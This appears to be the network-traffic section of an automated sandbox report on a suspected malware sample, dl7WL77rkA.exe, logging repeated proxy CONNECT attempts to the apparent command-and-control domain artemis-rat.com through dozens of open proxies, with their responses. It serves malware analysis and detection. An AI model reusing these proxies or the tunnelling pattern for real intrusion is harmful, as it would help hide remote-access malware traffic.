1729 | 192.168.2.5 | 54694 | 207.180.234.220 | 37736 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.839576006 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.592628956 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1730192.168.2.554675103.86.109.38803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.840861082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.227899075 CET | 343 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 11 Mar 2024 02:30:46 GMT
Content-Type: text/html
Content-Length: 182
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1731 | 192.168.2.5 | 54726 | 82.64.77.30 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.840943098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.145682096 CET | 555 | IN | HTTP/1.1 403 Proxy Error
Date: Mon, 11 Mar 2024 02:30:45 GMT
Server: Apache
X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Content-Length: 313
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.037456989 CET555INHTTP/1.1 403 Proxy Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                            Content-Length: 313
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1732192.168.2.55484374.48.7.43803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.841114998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.012542009 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.25.3
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1733192.168.2.55471251.210.223.930003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.841118097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1734192.168.2.55404037.187.91.192219813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.842807055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1735192.168.2.55473988.99.138.2169693876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.844058990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1736192.168.2.55468545.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.844733000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1737192.168.2.554721185.49.31.20780813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.888959885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1738192.168.2.550706138.197.102.119803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.892050982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.041127920 CET806INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:49 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.18 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 614
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1739192.168.2.554046193.239.58.9280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.892072916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1740192.168.2.554056146.59.70.29376653876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.894027948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.902414083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014625072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.014584064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1741192.168.2.554906104.19.138.4803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.895319939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.049719095 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1742192.168.2.55481346.17.63.166188883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.896142006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.250134945 CET339INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/4.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 5
                                                                                                                                                                                                                                                            X-Squid-Error: TCP_RESET 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from proxy.wakoopa.com
                                                                                                                                                                                                                                                            Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 72 65 73 65 74
                                                                                                                                                                                                                                                            Data Ascii: reset


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1743192.168.2.554796165.225.24.50100073876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.897490978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.202769995 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Server: Zscaler/6.2
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-length: 13607
                                                                                                                                                                                                                                                            Data Ascii: ...# Id: closedproxy.html 285144 2021-06-16 05:02:06Z szhang --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html><head><meta name="description" content="Zscaler makes the internet safe for businesses by protecting their employees from malware, viruses, and other security threats."><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Internet Security by Zscaler</title><script language="JavaScript">var defLang = 'en_US'</script>...<img alt="Zscaler" src="https://login.zscalerthree.net/img_logo_new1.png">--><style type="text/css">body {background-color:#e3e3e3;font-family:Arial, sans-serif;font-size:12px;color:#4B4F54;}a {cursor:pointer;text-decoration:none;color:#009dd0;}table {margin-top:10px;}td table {margin-top:0;text-align:center;}img {max-height:75px;max-width:430px;}.pg {position:absolute;top:0;bottom:0;left:0;right:0;overflow-x:hidden;white-space:nowrap;}.pg:before {content:"";display:inline-block;


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1744192.168.2.554830194.4.50.127123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.897835016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1745192.168.2.55474746.47.197.21031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.898251057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.893800974 CET | 536 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3699
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from host
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from host:3128
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1746192.168.2.5548513.12.144.14631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.901570082 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.122711897 CET | 116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1747192.168.2.554758222.179.155.9090913876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.902647018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.238518000 CET | 325 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.1
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1748192.168.2.5548128.209.255.1331283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.903341055 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.592694998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.879235983 CET | 38 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            content-length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1749192.168.2.554935104.21.85.200803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.903636932 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.058139086 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1750192.168.2.55487051.79.87.14485333876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.903640985 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1751192.168.2.554835167.172.159.43228473876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.907398939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1752192.168.2.55381698.170.57.23141453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.912144899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1753192.168.2.55477145.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:45.912486076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1754192.168.2.554778185.132.242.21280833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.912826061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1755192.168.2.554939162.159.242.150803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.913393021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.075656891 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:45 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


